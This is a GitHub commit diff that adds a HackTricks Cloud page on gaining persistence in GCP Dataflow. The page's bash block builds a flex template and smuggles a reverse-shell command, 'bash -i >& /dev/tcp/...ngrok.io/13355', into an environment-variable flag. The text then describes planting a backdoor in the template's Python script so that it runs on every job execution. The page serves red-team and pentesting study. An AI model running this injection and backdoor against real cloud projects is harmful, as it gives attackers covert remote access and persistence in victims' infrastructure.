-
Notifications
You must be signed in to change notification settings - Fork 259
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
faed697
commit 6368702
Showing
2 changed files
with
84 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
83 changes: 83 additions & 0 deletions
83
pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,83 @@ | ||
| # GCP - Dataflow Persistence | ||
|
|
||
| <details> | ||
|
|
||
| <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> | ||
|
|
||
| Other ways to support HackTricks: | ||
|
|
||
| * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! | ||
| * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) | ||
| * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) | ||
| * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** | ||
| * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) | ||
| * | ||
| * | ||
| * github repos. | ||
|
|
||
| </details> | ||
|
|
||
| ## Dataflow | ||
|
|
||
| ### Invisible persistence in built container | ||
|
|
||
| Following the [**tutorial from the documentation**](https://cloud.google.com/dataflow/docs/guides/templates/using-flex-templates) you can create a new (e.g. python) flex template: | ||
|
|
||
| ```bash | ||
| git clone https://github.com/GoogleCloudPlatform/python-docs-samples.git | ||
| cd python-docs-samples/dataflow/flex-templates/getting_started | ||
|
|
||
| # Create repository where dockerfiles and code is going to be stored | ||
| export REPOSITORY=flex-example-python | ||
| gcloud storage buckets create gs://$REPOSITORY | ||
|
|
||
| # Create artifact storage | ||
| export NAME_ARTIFACT=flex-example-python | ||
| gcloud artifacts repositories create $NAME_ARTIFACT \ | ||
| --repository-format=docker \ | ||
| --location=us-central1 | ||
| gcloud auth configure-docker us-central1-docker.pkg.dev | ||
|
|
||
| # Create template | ||
| export NAME_TEMPLATE=flex-template | ||
| gcloud dataflow $NAME_TEMPLATE build gs://$REPOSITORY/getting_started-py.json \ | ||
| --image-gcr-path "us-central1-docker.pkg.dev/gcp-labs-35jfenjy/$NAME_ARTIFACT/getting-started-python:latest" \ | ||
| --sdk-language "PYTHON" \ | ||
| --flex-template-base-image "PYTHON3" \ | ||
| --metadata-file "metadata.json" \ | ||
| --py-path "." \ | ||
| --env "FLEX_TEMPLATE_PYTHON_PY_FILE=getting_started.py" \ | ||
| --env "FLEX_TEMPLATE_PYTHON_REQUIREMENTS_FILE=requirements.txt" \ | ||
| --env "PYTHONWARNINGS=all:0:antigravity.x:0:0" \ | ||
| --env "/bin/bash -c 'bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/13355 0>&1' & #%s" \ | ||
| --region=us-central1 | ||
| ``` | ||
|
|
||
| **While it's building, you will get a reverse shell** (you could abuse env variables like in the previous example or other params that sets the Docker file to execute arbitrary things). In this moment, inside the reverse shell, it's possible to **go to the `/template` directory and modify the code of the main python script that will be executed (in our example this is `getting_started.py`)**. Set your backdoor here so everytime the job is executed, it'll execute it. | ||
|
|
||
| Then, next time the job is executed, the compromised container built will be run: | ||
|
|
||
| ```bash | ||
| # Run template | ||
| gcloud dataflow $NAME_TEMPLATE run testing \ | ||
| --template-file-gcs-location="gs://$NAME_ARTIFACT/getting_started-py.json" \ | ||
| --parameters=output="gs://$REPOSITORY/out" \ | ||
| --region=us-central1 | ||
| ``` | ||
|
|
||
| <details> | ||
|
|
||
| <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> | ||
|
|
||
| Other ways to support HackTricks: | ||
|
|
||
| * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! | ||
| * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) | ||
| * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) | ||
| * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** | ||
| * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) | ||
| * | ||
| * | ||
| * github repos. | ||
|
|
||
| </details> |